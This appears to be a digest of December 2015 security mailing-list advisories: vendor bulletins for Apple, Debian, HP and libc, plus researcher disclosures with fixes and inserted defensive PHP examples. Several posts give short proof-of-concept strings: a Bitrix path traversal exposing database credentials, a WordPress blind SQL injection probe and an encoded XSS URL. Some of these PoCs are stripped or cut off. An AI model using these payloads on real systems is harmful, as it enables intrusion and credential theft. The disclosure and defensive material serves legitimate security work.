APPLE-SA-2015-12-08-4 watchOS 2.1

2015-12-10 Thread Apple Product Security

APPLE-SA-2015-12-08-4 watchOS 2.1

watchOS 2.1 is now available and addresses the following:

AppSandbox
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may maintain access to Contacts
after having access revoked
Description:  An issue existed in the sandbox's handling of hard
links. This issue was addressed through improved hardening of the app
sandbox.
CVE-ID
CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University
POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North
Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi
of TU Darmstadt

Compression
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  An uninitialized memory access issue existed in zlib.
This issue was addressed through improved memory initialization and
additional validation of zlib streams.
CVE-ID
CVE-2015-7054 : j00ru

CoreGraphics
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team

CoreMedia Playback
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  A memory corruption issue existed in the processing of
malformed media files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-7075

dyld
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  A segment validation issue existed in dyld. This was
addressed through improved environment sanitization.
CVE-ID
CVE-2015-7072 : Apple

FontParser
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  Multiple memory corruption issues existed in the
processing of font files. These issues were addressed through
improved bounds checking.
CVE-ID
CVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP's Zero
Day Initiative

GasGauge
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-6979 : PanguTeam

ImageIO
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Processing a maliciously crafted image may lead to arbitrary
code execution
Description:  A memory corruption issue existed in ImageIO. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7053 : Apple

IOHIDFamily
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple memory corruption issues existed in
IOHIDFamily. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-7111 : beist and ABH of BoB
CVE-2015-7112 : Ian Beer of Google Project Zero

IOKit SCSI
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with kernel privileges
Description:  A null pointer dereference existed in the handling of a
certain userclient type. This issue was addressed through improved
validation.
CVE-ID
CVE-2015-7068 : Ian Beer of Google Project Zero

Kernel
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A local application may be able to cause a denial of service
Description:  Multiple denial of service issues were addressed
through improved memory handling.
CVE-ID
CVE-2015-7040 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7041 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7042 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7043 : Tarjei Mandt (@kernelpool)

Kernel
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A local user may be able to execute arbitrary code with
kernel privileges
Description:  An issue existed in the parsing of mach messages. This
issue was addressed through improved validation of mach messages.
CVE-ID
CVE-2015-7047 : Ian Beer of Google 

[SECURITY] [DSA 3415-1] chromium-browser security update

2015-12-10 Thread Michael Gilbert

-------------------------------------------------------------------------
Debian Security Advisory DSA-3415-1                   secur...@debian.org
https://www.debian.org/security/                          Michael Gilbert
December 09, 2015                    https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package: chromium-browser
CVE ID : CVE-2015-1302 CVE-2015-6764 CVE-2015-6765 CVE-2015-6766
 CVE-2015-6767 CVE-2015-6768 CVE-2015-6769 CVE-2015-6770
 CVE-2015-6771 CVE-2015-6772 CVE-2015-6773 CVE-2015-6774
 CVE-2015-6775 CVE-2015-6776 CVE-2015-6777 CVE-2015-6778
 CVE-2015-6779 CVE-2015-6780 CVE-2015-6781 CVE-2015-6782
 CVE-2015-6784 CVE-2015-6785 CVE-2015-6786

Several vulnerabilities have been discovered in the chromium web browser.

CVE-2015-1302

Rub Wu discovered an information leak in the pdfium library.

CVE-2015-6764

Guang Gong discovered an out-of-bounds read issue in the v8
javascript library.

CVE-2015-6765

A use-after-free issue was discovered in AppCache.

CVE-2015-6766

A use-after-free issue was discovered in AppCache.

CVE-2015-6767

A use-after-free issue was discovered in AppCache.

CVE-2015-6768

Mariusz Mlynski discovered a way to bypass the Same Origin
Policy.

CVE-2015-6769

Mariusz Mlynski discovered a way to bypass the Same Origin
Policy.

CVE-2015-6770

Mariusz Mlynski discovered a way to bypass the Same Origin
Policy.

CVE-2015-6771

An out-of-bounds read issue was discovered in the v8
javascript library.

CVE-2015-6772

Mariusz Mlynski discovered a way to bypass the Same Origin
Policy.

CVE-2015-6773

cloudfuzzer discovered an out-of-bounds read issue in the
skia library.

CVE-2015-6774

A use-after-free issue was found in extensions binding.

CVE-2015-6775

Atte Kettunen discovered a type confusion issue in the pdfium
library.

CVE-2015-6776

Hanno Böck discovered an out-of-bounds access issue in the
openjpeg library, which is used by pdfium.

CVE-2015-6777

Long Liu found a use-after-free issue.

CVE-2015-6778

Karl Skomski found an out-of-bounds read issue in the pdfium
library.

CVE-2015-6779

Til Jasper Ullrich discovered that the pdfium library does
not sanitize "chrome:" URLs.

CVE-2015-6780

Khalil Zhani discovered a use-after-free issue.

CVE-2015-6781

miaubiz discovered an integer overflow issue in the sfntly
library.

CVE-2015-6782

Luan Herrera discovered a URL spoofing issue.

CVE-2015-6784

Inti De Ceukelaire discovered a way to inject HTML into
serialized web pages.

CVE-2015-6785

Michael Ficarra discovered a way to bypass the Content
Security Policy.

CVE-2015-6786

Michael Ficarra discovered another way to bypass the Content
Security Policy.

For the stable distribution (jessie), these problems have been fixed in
version 47.0.2526.73-1~deb8u1.

For the testing distribution (stretch), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 47.0.2526.73-1.

We recommend that you upgrade your chromium-browser packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org


MacOS/iPhone/Apple Watch/Apple TV libc File System Buffer Overflow

2015-12-10 Thread submit
Hi @ll,

Today Apple fixed a buffer overflow issue in LIBC/FTS (CVE-2015-7039).

Patch available for: 
- OS X El Capitan v10.11 and v10.11.1
- iPhone 4s and later,
- Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
- Apple TV (4th generation)

Impact:  Processing a maliciously crafted package may lead to arbitrary code 
execution
Description:  Multiple buffer overflows existed in the C standard library. 
These issues were addressed through improved bounds

Conception and description of the issue here:

https://cxsecurity.com/issue/WLB-2015100149

Best Regards,
Maksymilian Arciemowicz (http://cert.cx)
https://cxsecurity.com - Independent Information


[CVE-2015-7706] SECURE DATA SPACE API Multiple Non-Persistent Cross-Site Scripting Vulnerabilities

2015-12-10 Thread Vogt, Thomas

secunet Security Networks AG Security Advisory

Advisory: SECURE DATA SPACE API Multiple Non-Persistent Cross-Site Scripting 
Vulnerabilities

1. DETAILS
----------
Product: SECURE DATA SPACE 
Vendor URL: www.ssp-europe.eu
Type: Cross-site Scripting[CWE-79]
Date found: 2015-09-30
Date published: 2015-12-09
CVSSv2 Score: 4,3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)  
CVE: CVE-2015-7706


2. AFFECTED VERSIONS
--------------------
All product versions (Online, Dedicated, For Linux/Windows) in 
Web-Client v3.1.1-2  
restApiVersion: 3.5.7-FINAL
sdsServerVersion: 3.4.14-FINAL


3. INTRODUCTION
---------------
"The highly secure business solution for easy storage, synchronization, 
distribution and management of data - regardless of location or device"

(from the vendor's homepage)


4. VULNERABILITY DETAILS
------------------------
The Secure Data Share version v3.1.1-2 is vulnerable to multiple 
unauthenticated Non-Persistent Cross-Site Scripting vulnerabilities when 
user-supplied input is processed by the server.[0]  

#1 Proof-of-Concept:
https://example.com/api/v3//public/shares/downloads/111"}

#2 Proof-of-Concept(authType parameter):
POST /api/v3/auth/login 
   

[security bulletin] HPSBMU03520 rev.1 - HP Insight Control server provisioning, Remote Disclosure of Information

2015-12-10 Thread security-alert


Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04918653

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04918653
Version: 1

HPSBMU03520 rev.1 - HP Insight Control server provisioning, Remote Disclosure
of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-12-09
Last Updated: 2015-12-09

Potential Security Impact:  Remote disclosure of information

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY

A potential security vulnerability has been identified with HP Insight
Control server provisioning that could be exploited remotely resulting in
information disclosure.

References:  CVE-2015-6858
PSRT102928

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP Insight Control server provisioning Prior to v7.5.0 RabbitMQ

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference       Base Vector                    Base Score
  CVE-2015-6858   (AV:N/AC:M/Au:N/C:P/I:N/A:N)   4.3
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

Hewlett Packard Enterprise has provided HP Insight Control server
provisioning version 7.5.0 to resolve this vulnerability:

http://www.hp.com/go/insightupdates

HISTORY
 Version:1 (rev.1) - 9 December 2015 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability with any HPE supported
product, send Email to: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2015 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.



Path Traversal via CSRF in bitrix.xscan Bitrix Module

2015-12-10 Thread High-Tech Bridge Security Research
Advisory ID: HTB23278
Product: bitrix.xscan Bitrix module
Vendor: Bitrix
Vulnerable Version(s): 1.0.3 and probably prior
Tested Version: 1.0.3
Advisory Publication:  November 18, 2015  [without technical details]
Vendor Notification: November 18, 2015 
Vendor Patch: November 24, 2015 
Public Disclosure: December 9, 2015 
Vulnerability Type: Path Traversal [CWE-22]
CVE Reference: CVE-2015-8357
Risk Level: Medium 
CVSSv3 Base Score: 4.2 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in the 
bitrix.xscan Bitrix module, which is intended to discover and neutralize malware 
on the website. The vulnerability can be exploited to change the extension of 
arbitrary PHP files on the target system and gain access to potentially sensitive 
information, such as database credentials, or even make the whole website 
inaccessible.

The vulnerability exists due to the absence of filtering of directory traversal 
characters (e.g. "../") passed via the "file" HTTP GET parameter to the 
"/bitrix/admin/bitrix.xscan_worker.php" script. A remote authenticated attacker 
can upload a file with malicious contents and pass this file to the vulnerable 
script along with the name of the file to rename. As a result, the vulnerable 
script will change the extension of the given file from ".php" to ".ph_". These 
actions will make the web server treat this file as a text file and display its 
contents instead of executing it. 

To demonstrate the vulnerability follow the steps below:

1) Choose an arbitrary image file and modify it by appending the eval() PHP 
function at the end of the file. This is needed because the file will be renamed 
only if it contains potentially dangerous content.
2) Upload this file using standard CMS functionality, for example as an image 
for your profile.
3) Obtain the name of the image you have uploaded. You can do this using your 
profile. In our example the image had the following path: 
"/upload/main/77f/image.jpg".
4) Construct the exploit payload using the path to the image and the file you 
want to view. As a demonstration we chose to view the contents of the 
"/bitrix/.settings.php" file, since it contains database credentials:

file=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php

5) Use the following PoC code to reproduce the vulnerability:

http://[host]/admin/bitrix.xscan_worker.php?action=prison=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php;>

As a result, the vulnerable script will rename "/bitrix/.settings.php" into 
"/bitrix/.settings.ph_", which makes it readable by anonymous users:

http://[host]/bitrix/.settings.ph_

Access to vulnerable modules requires administrative privileges; however, the 
vulnerability can be used by anonymous users via a CSRF vector. Steps 1-4 do not 
require administrative or special privileges and can be performed by any user 
who can register at the website or upload an image. 

---

Solution:

Update to bitrix.xscan module 1.0.4

---

References:

[1] High-Tech Bridge Advisory HTB23278 - 
https://www.htbridge.com/advisory/HTB23278 - Path Traversal and CSRF in 
bitrix.xscan Bitrix Module
[2] bitrix.xscan - https://marketplace.1c-bitrix.ru/solutions/bitrix.xscan/ - 
Module for Bitrix CMS that can detect Trojans on your website.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



PHP File Inclusion in bitrix.mpbuilder Bitrix Module

2015-12-10 Thread High-Tech Bridge Security Research
Advisory ID: HTB23281
Product: bitrix.mpbuilder Bitrix module
Vendor: www.1c-bitrix.ru
Vulnerable Version(s): 1.0.10 and probably prior
Tested Version: 1.0.10
Advisory Publication:  November 18, 2015  [without technical details]
Vendor Notification: November 18, 2015 
Vendor Patch: November 25, 2015 
Public Disclosure: December 9, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8358
Risk Level: Critical 
CVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in the 
bitrix.mpbuilder Bitrix module, which can be exploited to include and execute 
an arbitrary PHP file on the target system with the privileges of the web 
server. The attacker will be able to execute arbitrary system commands and gain 
complete control over the website.

Access to vulnerable modules requires administrative privileges; however, the 
vulnerability can be used by anonymous users via a CSRF vector.

The vulnerability exists due to insufficient filtering of the "work[]" HTTP POST 
parameter in the "/bitrix/admin/bitrix.mpbuilder_step2.php" script before using 
it in the include() PHP function. A remote attacker can include and execute an 
arbitrary local file on the target system.

The simple exploit below will include and execute the "/tmp/file" file:

http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog; 
method="post" name="main">






In a real-world scenario an attacker can use session files to execute arbitrary 
PHP code. For example, an attacker can change the name in his profile to  and create a CSRF exploit that will pass arbitrary 
commands and execute them on the system. The PoC code below executes the /bin/ls 
command using a previously created session file with a malicious "NAME" value:


http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog; 
method="post" name="main">








---

Solution:

Update to bitrix.mpbuilder module 1.0.12

---

References:

[1] High-Tech Bridge Advisory HTB23281 - 
https://www.htbridge.com/advisory/HTB23281 - PHP File Inclusion in 
bitrix.mpbuilder Bitrix module
[2] bitrix.mpbuilder - 
https://marketplace.1c-bitrix.ru/solutions/bitrix.mpbuilder/ - Bitrix module 
for software developers. 
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.
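A defensive companion to the two Bitrix advisories above (HTB23278's "file" parameter reaching rename() through "../", and HTB23281's "work[]" values reaching include()): an added example, not Bitrix's or High-Tech Bridge's code, showing how to confine a user-supplied path to a base directory with realpath() and how to allowlist includable module names. The directory layout, function names and the "prison" stand-in are assumptions.

```php
<?php
// Added example (not Bitrix module code): confining user-supplied paths before
// rename() and include(), the two sinks the HTB23278 and HTB23281 advisories
// describe. Directory names, function names and the file layout are assumptions.
declare(strict_types=1);

/**
 * Resolve $userPath relative to $baseDir and return the canonical absolute path,
 * or null when the input escapes $baseDir (e.g. via "../"), contains a NUL byte,
 * does not exist, or is not a regular file.
 */
function resolveWithin(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($userPath, "\0") !== false) {
        return null;
    }
    // realpath() collapses "." and ".." and resolves symlinks, so the prefix
    // check below sees the real target, not the spelling the caller chose.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . ltrim($userPath, '/\\'));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Compare with the separator appended so that "/srv/upload2" is not
    // accepted as being inside "/srv/upload".
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

/**
 * Hardened stand-in for the xscan "prison" step: only a .php file that really
 * lives under the upload directory may be renamed to .ph_, so a traversal to
 * /bitrix/.settings.php is refused before any filesystem change happens.
 */
function quarantineUploadedPhp(string $uploadDir, string $userPath): bool
{
    $target = resolveWithin($uploadDir, $userPath);
    if ($target === null || substr($target, -4) !== '.php') {
        return false;
    }
    return rename($target, substr($target, 0, -4) . '.ph_');
}

/**
 * Hardened stand-in for the mpbuilder "work[]" handling: a request may only
 * name modules from a fixed allowlist, and the name is mapped to a file under
 * the module directory; it is never used as a path on its own.
 */
function includeWorkModules(string $moduleDir, array $work, array $allowed): int
{
    $included = 0;
    foreach ($work as $name) {
        if (!is_string($name) || !in_array($name, $allowed, true)) {
            continue; // unknown entry: skipped, never passed to include()
        }
        $path = resolveWithin($moduleDir, $name . '.php');
        if ($path !== null) {
            include $path;
            $included++;
        }
    }
    return $included;
}

// Constructed demonstration layout in a temporary directory (no real Bitrix install).
$root = sys_get_temp_dir() . '/bitrix_demo_' . bin2hex(random_bytes(4));
mkdir("$root/upload/main/77f", 0700, true);
mkdir("$root/bitrix/modules", 0700, true);
file_put_contents("$root/upload/main/77f/image.php", "<?php // constructed upload\n");
file_put_contents("$root/bitrix/.settings.php", "<?php return ['db' => 'constructed'];\n");
file_put_contents("$root/bitrix/modules/blog.php", "<?php // constructed module\n");

// A .php file inside the upload directory: resolves and is renamed to .ph_.
var_dump(quarantineUploadedPhp("$root/upload", 'main/77f/image.php'));
// The advisory's payload shape: the "image.jpg.." component does not exist, so
// realpath() fails and the request is refused.
var_dump(quarantineUploadedPhp("$root/upload", 'main/77f/image.jpg../../../../../bitrix/.settings.php'));
// A plain traversal to an existing file outside the base: refused by the prefix check.
var_dump(quarantineUploadedPhp("$root/upload", '../bitrix/.settings.php'));
// Confirms the settings file was not renamed by either refused request.
var_dump(file_exists("$root/bitrix/.settings.php"));

// work[] values: only the allowlisted "blog" is included; the other entries are dropped.
var_dump(includeWorkModules("$root/bitrix/modules", ['blog', '../.settings', '/tmp/file'], ['blog']));
```

The same admin endpoints would additionally need a CSRF token check on every state-changing request, since both advisories note the actions are reachable through a CSRF vector even though they require administrative privileges.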



WordPress Users Ultra Plugin [Blind SQL injection] - Update

2015-12-10 Thread Panagiotis Vagenas


* Exploit Title: WordPress Users Ultra Plugin [Blind SQL injection]
* Discovery Date: 2015/10/19
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps

Description


One can perform an SQL injection attack simply by exploiting the
following WP ajax actions:

1. `edit_video`
2. `delete_photo`
3. `delete_gallery`
4. `delete_video`
5. `reload_photos`
6. `edit_gallery`
7. `edit_gallery_confirm`
8. `edit_photo`
9. `edit_photo_confirm`
10. `edit_video_confirm`
11. `set_as_main_photo`
12. `sort_photo_list`
13. `sort_gallery_list`
14. `reload_videos`

POST parameters that are exploitable in each action respectively:

1. `video_id`
2. `photo_id`
3. `gal_id`
4. `video_id`
5. `gal_id`
6. `gal_id`
7. `gal_id`
8. `photo_id`
9. `photo_id`
10. `video_id`
11. `photo_id`, `gal_id`
12. `order`
13. `order`
14. `video_id`

In case #7 a user can also change the gallery name, description and
visibility by setting POST parameters `gal_name`, `gal_desc` and
`gal_visibility` respectively.

In case #8 `photo_id` is first cast to an integer and a query to the DB is
performed. If results are returned, then for each result a new query is
performed without casting the `photo_id` to an integer. So if an attacker
knows a valid video id, then they can perform the attack in the second
query. This is achievable because `

In case #9 a user can also change the photo name, description, tags and
category by setting POST parameters `photo_name`, `photo_desc`,
`photo_tags` and `photo_category` respectively.

In case #10 a user can also change the video name, unique id and type by
setting POST parameters `video_name`, `video_unique_id` and `video_type`
respectively.

Because the functions wpdb::get_results() and wpdb::query() are in use here,
only one SQL statement can be executed per request. This keeps the severity of
the attack low.
In addition, all actions are privileged, so the user must have an active
account on the vulnerable website in order to perform the attack.


PoC


Send a post request to
`http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data:
`action=edit_video_id=1 and sleep(5) `

Timeline


2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
2015/12/08 - Vendor provided new version 1.5.63 which resolves issues

Solution

 
Upgrade to version 1.5.63
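The cast-once-then-interpolate pattern the post describes (case #8), as an added example that is not the Users Ultra plugin's code: a hypothetical vulnerable handler beside a hardened one that routes every request value through wpdb::prepare(). The table name and the minimal $wpdb stand-in are assumptions so that the example runs without WordPress.

```php
<?php
// Added example (not the Users Ultra plugin's code): the "cast for the first
// query, interpolate raw in the second" pattern the post describes, next to a
// version that parameterises both queries. The table name and the wpdb stand-in
// are assumptions made so the example runs outside WordPress.
declare(strict_types=1);

/** Minimal stand-in for WordPress' $wpdb: records SQL instead of executing it. */
final class WpdbStandIn
{
    /** @var string[] every statement that would have reached MySQL */
    public array $log = [];

    /** Mimics wpdb::prepare(): %d becomes an integer, %s a quoted, escaped string. */
    public function prepare(string $query, ...$args): string
    {
        $i = 0;
        return preg_replace_callback('/%[ds]/', function (array $m) use ($args, &$i) {
            $value = $args[$i++];
            return $m[0] === '%d'
                ? (string) (int) $value
                : "'" . addslashes((string) $value) . "'";
        }, $query);
    }

    public function get_results(string $sql): array
    {
        $this->log[] = $sql;
        return [['id' => 1]]; // constructed row so the per-result loop runs
    }

    public function query(string $sql): int
    {
        $this->log[] = $sql;
        return 1;
    }
}

/** Hypothetical reconstruction of the vulnerable shape: the cast protects only the first query. */
function editPhotoVulnerable(WpdbStandIn $wpdb, string $photoId): void
{
    $id = (int) $photoId;
    $rows = $wpdb->get_results("SELECT id FROM wp_uultra_photos WHERE id = $id");
    foreach ($rows as $row) {
        // The raw request value is interpolated here, so "1 and sleep(5)" becomes SQL.
        $wpdb->query("UPDATE wp_uultra_photos SET views = views + 1 WHERE id = $photoId");
    }
}

/** Hardened version: both queries go through prepare(); nothing from the request is interpolated. */
function editPhotoHardened(WpdbStandIn $wpdb, string $photoId): void
{
    // In real plugin code the AJAX handler would also call check_ajax_referer()
    // and current_user_can() before touching the database.
    $rows = $wpdb->get_results(
        $wpdb->prepare('SELECT id FROM wp_uultra_photos WHERE id = %d', $photoId)
    );
    foreach ($rows as $row) {
        $wpdb->query(
            $wpdb->prepare('UPDATE wp_uultra_photos SET views = views + 1 WHERE id = %d', $photoId)
        );
    }
}

// The probe value from the post's PoC, as it would arrive in $_POST['photo_id'].
$probe = '1 and sleep(5)';

$vulnerable = new WpdbStandIn();
editPhotoVulnerable($vulnerable, $probe);
$hardened = new WpdbStandIn();
editPhotoHardened($hardened, $probe);

// Print both logs: the second statement of the vulnerable handler still carries
// the injected "and sleep(5)", while %d in the hardened handler keeps only the
// leading integer of the value.
foreach (['vulnerable' => $vulnerable->log, 'hardened' => $hardened->log] as $label => $log) {
    echo "$label:\n";
    foreach ($log as $sql) {
        echo "  $sql\n";
    }
}
```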



XSS vulnerability in Intellect Core banking software - Polaris

2015-12-10 Thread msahu
[+] Credits: Mayank Sahu
[+] Email: ms...@controlcase.com


Vendor:

Intellect Design Arena (Polaris)

Product:
===
Intellect Core banking software (Armar module)

Vulnerability Type:
==
Cross site scripting - XSS

CVE Reference:
==
CVE-2015-6540

Vulnerability Details:
==
The application allows arbitrary client-side JS code execution on victims who 
click our infected link. Session ID and data theft may follow, as well as the 
possibility to bypass CSRF protections, inject iframes to establish 
communication channels, etc.
The vulnerability exists after login into the application.

XSS Exploit code(s):
===

http://Server-address:7001/AAL/LoginAfter.jsp?page=Logout.jsp%27|[window[%27location%27]%3D%27\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6c\x65\x72\x74\x28\x27\x43\x43\x27\x29%27]%2B%27


Disclosure Timeline:
=
Vendor Notification: September 21, 2015 
December 09, 2015  : Public Disclosure


Exploitation Technique:
===
Remote

Severity Level:

High


Description:
=
Request Method(s):  [+] GET
Vulnerable Product: [+] Intellect Core banking solution (Armor)
Vulnerable Parameter(s):[+] page

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by Mayank Sahu


Advisory: Arro and Other Android Taxi Hailing Apps Did Not Use SSL (Mobile Knowledge)

2015-12-10 Thread securityresearch
Original:
http://securityresearch.shaftek.biz/2015/12/goarro-and-other-taxi-hailing-apps-did-not-use-ssl.html

CERT Advisory:
https://www.kb.cert.org/vuls/id/439016

Advisory: Arro and Other Android Taxi Hailing Apps Did Not Use SSL (Mobile 
Knowledge)

Overview
Arro and possibly over 100 other Android taxi hailing apps did not use SSL to 
secure communications between the application and its servers.

Background
Arro is a taxi hailing service allowing users to hail yellow taxis in New York 
from their smartphones. The service also allows users to pay for their ride via 
the application while they are in a taxi. The underlying technology is a white 
branded version of an application called Taxi Hail, made by a company called 
Mobile Knowledge, in Ottawa, Canada, a subsidiary of Creative Mobile 
Technologies, LLC (CMT) of New York, NY. Both are providers of technology 
solutions for the taxi industry. At least 100 other white branded taxi 
applications run on the same platform as Arro, with a link to a non-exhaustive 
list appearing later in this document.

Details
While monitoring network traffic from an Android smartphone, we observed that 
most communications between the Arro Android application and its servers were 
unencrypted and did not use SSL. Instead, regular HTTP calls were being used. 
Further investigation showed that the underlying application and servers were a 
white branded version of TaxiHail, developed by Mobile Knowledge.

Information observed included:
- Username and passwords for the users of the application
- User profile including address and phone number
- Credentials for various APIs and payment gateways used by the application
- Latitude and longitude of the user requesting a taxi
- Last four digits and expiration date of the user's credit cards on file
- When adding a new credit card: full credit card information

Payments were made via a separate gateway that uses SSL and were not at risk. 
However, adding credit cards would be done without SSL. 

A secondary minor issue was also discovered. The GoArro app created a text log 
on the SD Card of the device being tested. This log, located in 
"/TaxiHail/errorlog.txt", contained GPS locations for the user, which would be 
accessible to applications on the same phone without location access. This 
issue has also been fixed.


References
Arro website: https://www.goarro.com/ 
CERT/CC ID: VU# 439016

